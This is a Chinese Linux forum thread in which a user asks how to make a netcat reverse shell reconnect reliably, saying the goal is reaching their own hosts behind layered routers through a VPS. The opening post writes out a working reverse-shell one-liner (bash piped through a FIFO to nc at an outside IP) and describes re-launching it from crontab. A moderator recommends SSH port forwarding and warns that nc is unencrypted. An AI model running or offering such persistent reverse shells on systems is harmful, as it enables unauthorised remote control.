请教: nc命令反弹shell

sh/bash/dash/ksh/zsh等Shell脚本
回复
tunx0000
帖子: 12
注册时间: 2018-01-05 16:26
系统: Bodhi
送出感谢: 3 次
接收感谢: 0

请教: nc命令反弹shell

#1

帖子 tunx0000 » 2018-08-26 17:29

服务端:

代码: 全选

nc -v -l 3333
客户端:

代码: 全选

mkfifo /tmp/f
cat /tmp/f | /bin/bash -i | nc 1.1.1.1 3333 > /tmp/f
请教:
[1] 在服务端手动Ctrl+C中断nc命令,再次

代码: 全选

nc -v -l 3333
打开服务,服务端与客户端断开,服务端输入

代码: 全选

pwd
无响应,但是客户端的nc命令还在运行,实际上连接已经断开了。
请问,怎么能让客户端判断服务端己主动断开,从而让客户端也断开,以便重连?
[2] 如果把命令

代码: 全选

cat /tmp/f | /bin/bash -i | nc 1.1.1.1 3333 > /tmp/f
加入

代码: 全选

crontab -e 
计划,即使服务端手动断开,客户端通过新建nc可以重建连接,问题是crontab每执行一次就会生成一个新的nc任务,如果频繁新建,估计会新建无数nc连接。只尝试执行了五次,

代码: 全选

ps -ef | grep nc | grep -v grep
查到5个pid.
请教,怎么能避免crontab执行一次后kill旧命令,生成新命令。


目的:
内网有多层路由且对上级路由无权限控制,因此想通过反弹shell,把局域网内的主机shell反弹给有公网ip的vps上。为了保证不会对局域网内的主机失去控制,想在局域网的主机上多设几层连接保障。
求指点,谢谢
头像
astolia
论坛版主
帖子: 4417
注册时间: 2008-09-18 13:11
送出感谢: 1 次
接收感谢: 739 次

Re: 请教: nc命令反弹shell

#2

帖子 astolia » 2018-08-26 23:50

nc还是过于简陋了。我宁可用ssh的端口转发,保持连接和断线重连都简单的多。
http://arondight.me/2016/02/17/%E4%BD%B ... %E9%80%8F/
tunx0000
帖子: 12
注册时间: 2018-01-05 16:26
系统: Bodhi
送出感谢: 3 次
接收感谢: 0

Re: 请教: nc命令反弹shell

#3

帖子 tunx0000 » 2018-08-27 9:05

astolia 写了:
2018-08-26 23:50
nc还是过于简陋了。我宁可用ssh的端口转发,保持连接和断线重连都简单的多。
http://arondight.me/2016/02/17/%E4%BD%B ... %E9%80%8F/
有人说ssh端口转发流量容易被GFW监测导致VPS被封IP,不知道仅仅出于内网穿透目的会不会被封
tunx0000
帖子: 12
注册时间: 2018-01-05 16:26
系统: Bodhi
送出感谢: 3 次
接收感谢: 0

Re: 请教: nc命令反弹shell

#4

帖子 tunx0000 » 2018-08-27 9:08

astolia 写了:
2018-08-26 23:50
nc还是过于简陋了。我宁可用ssh的端口转发,保持连接和断线重连都简单的多。
http://arondight.me/2016/02/17/%E4%BD%B ... %E9%80%8F/

http://arondight.me/2016/02/17/%E4%BD%B ... %E9%80%8F/

这是您的主页么?搜 反弹shell 的时候已经拜读过了.
头像
astolia
论坛版主
帖子: 4417
注册时间: 2008-09-18 13:11
送出感谢: 1 次
接收感谢: 739 次

Re: 请教: nc命令反弹shell

#5

帖子 astolia » 2018-08-27 9:53

tunx0000 写了:
2018-08-27 9:05
有人说ssh端口转发流量容易被GFW监测导致VPS被封IP,不知道仅仅出于内网穿透目的会不会被封
虽然墙是黑盒,但一般都认为对ssh是靠流量特征分析,重点关注你的流量是否像http。另外也不是你用netcat就不会被盯上,毕竟是个黑盒你也不知道它的判定标准是什么。还有就算你的IP很低调,同IP段有人太嚣张导致整个IP段挂掉也发生过很多次了。
最重要的一点是,netcat传输的数据没有加密,你远程登录时的用户名密码各级网关上的人都可以看的一清二楚。
tunx0000 写了:
2018-08-27 9:08
http://arondight.me/2016/02/17/%E4%BD%B ... %E9%80%8F/

这是您的主页么?搜 反弹shell 的时候已经拜读过了.
不是,我也是随手搜的一篇
这些用户感谢了作者 astolia 于这个帖子:
tunx0000 (2018-08-27 10:22)
评价: 3.7%
tunx0000
帖子: 12
注册时间: 2018-01-05 16:26
系统: Bodhi
送出感谢: 3 次
接收感谢: 0

Re: 请教: nc命令反弹shell

#6

帖子 tunx0000 » 2018-08-27 10:21

astolia 写了:
2018-08-27 9:53

虽然墙是黑盒,但一般都认为对ssh是靠流量特征分析,重点关注你的流量是否像http。另外也不是你用netcat就不会被盯上,毕竟是个黑盒你也不知道它的判定标准是什么。还有就算你的IP很低调,同IP段有人太嚣张导致整个IP段挂掉也发生过很多次了。
最重要的一点是,netcat传输的数据没有加密,你远程登录时的用户名密码各级网关上的人都可以看的一清二楚。
谢谢科谱.
我再试试ssh.
我想找一个尽量简单的方法保证稳定不会失去对主机的控制,目前想同时用frp, nc和ssh.ssh免密要传公钥,不知道本地ip变了,公钥要不要重新生成.还有,在家里配置好了ssh, 到单位再连接vps的时候不知道会不会还出现"Are you sure you want to continue connecting(yes/no)?"的提示,需要再次输入"yes", ssh密码倒是可以用sshpass输入.
nc不需要输入密码和确认连接,好像简单点.麻烦在于还没想好怎么保证断线重连.
GFW的问题可以用一台国内的vps, 上不了谷歌的vps应该就不会被GFW放在心上了吧.
我再查查,试试其它语言的反弹shell.
总之,非常感谢.
回复

回到 “Shell脚本”